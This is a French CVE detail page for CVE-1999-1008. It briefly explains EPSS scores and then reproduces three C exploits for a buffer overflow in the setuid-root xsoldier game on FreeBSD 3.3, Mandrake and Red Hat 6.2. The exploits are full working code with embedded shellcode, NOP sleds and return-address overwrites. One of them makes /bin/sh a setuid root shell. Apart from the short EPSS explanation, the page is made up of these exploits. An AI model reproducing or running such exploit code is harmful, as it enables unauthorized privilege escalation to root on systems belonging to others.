CVE-1999-1008 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string. The user does not have to have a valid $DISPLAY to exploit this. /* * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier@usa.net */ #include <stdio.h> char shell[]= /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4400; char buf[bsize]; int eip = 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n"); fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4325; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); }

/* source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string. The user does not have to have a valid $DISPLAY to exploit this. */ /*Larry W. Cashdollar linux xsolider exploit. *lwc@vapid.dhs.org http://vapid.dhs.org *if xsolider is built and installed from its source it will be installed *setuid root in /usr/local/games *original exploit found by brock tellier for freebsd 3.3 ports packages. *If a setregid() call is placed in the shellcode, you can get egid=12 *with the default mandrake installation.*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 4480 /*our buffersize. */ char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i, offset; long retaddr = get_sp (); if (argc <= 1) offset = 0; else offset = atoi (argv[1]); /*#Copy the NOPs in to the buffer leaving space for shellcode and #pointers*/ for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP; /*[NNNNNNNNNNNNNNNNNNNNN ]*/ /* ^-- LEN -(strlen(shellcode)) - 35*/ /*#Copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/ /* ^-(buffer+i) */ /*#Fill the buffer with our new address to jump to esp + offset */ for (i = i + strlen (shellcode); i < LEN; i += 4) *(long *) &buffer[i] = retaddr+offset; /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/ /* ^-(i+strlen(shellcode))*/ printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN); execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0); }

#include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define BUFSIZE 4408 #define OFFSET 0 #define RANGE 20 unsigned char blah[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[BUFSIZE]; int i, offset; unsigned long ret; if (argc > 1) offset = atoi(argv[1]); else offset = OFFSET; for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++) *(buffer + i) = NOP; memcpy (buffer + i, blah, strlen (blah)); ret = get_sp(); for (i = i + strlen (blah); i < BUFSIZE; i += 4) *(long *) &buffer[i] = ret+offset; fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); fprintf(stderr, "zorgon@antionline.org\n"); fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); execl ("./xsoldier", "xsoldier", "-display", buffer, 0); } // milw0rm.com [2000-12-15]